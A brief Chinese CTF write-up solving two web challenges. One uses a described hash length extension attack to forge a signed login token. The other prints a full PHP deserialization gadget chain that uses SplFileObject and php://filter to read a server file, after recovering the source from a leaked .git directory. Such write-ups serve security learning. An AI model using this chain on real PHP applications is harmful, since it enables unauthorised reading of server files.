非常好的比赛,使我来不及交wp
目录
easylogin
访问/?source=1拿到源码
一眼哈希长度拓展攻击,参考奇安信攻防社区-深入浅出-Hash长度拓展攻击
从现有token:token=Z3Vlc3Q%3D.d08a46b7bc97a61a39efc7aa2d9b324b
得知guest+13位salt值的md5值为d08a46b7bc97a61a39efc7aa2d9b324b,共18位
基于此,进行哈希长度拓展攻击
在得到的值前拼接上guest的hash值,再base64编码
serp
dirsearch扫到.git泄露
GitHack拿源码
搓链子
<?php
class Post {
public $title;
public $content;
public function __construct($title, $content) {
$this->title = $title;
$this->content = $content;
}
public function __toString() {
return $this->title . "/" . $this->content;
}
}
class Maker {
public $model = "Post";
public $args = ["Title", "Contents"];
protected $obj = null;
public function __construct($model, $args){
$this->model = $model;
$this->args = $args;
}
public function getInstance() {
if($this->obj == null) {
$this->obj = new $this->model(...$this->args);
}
return $this->obj;
}
public function __toString() {
return "object(". $this->model ."){" . strval($this->getInstance()) . "}";
}
public function __destruct() {
$this->obj = null;
}
}
$p = [
0=>"test",
// 1=>"test2"
1=>new Maker("SplFileObject",["php://filter/convert.base64-encode/resource=f1a9.php"])
];
if($p){
$post = (new Maker("Post", $p))->getInstance();
$posts[] = $post;
$a=serialize($posts);
echo urlencode($a)."\n";
echo unserialize($a)[0]->content;
}
打入,拿到flag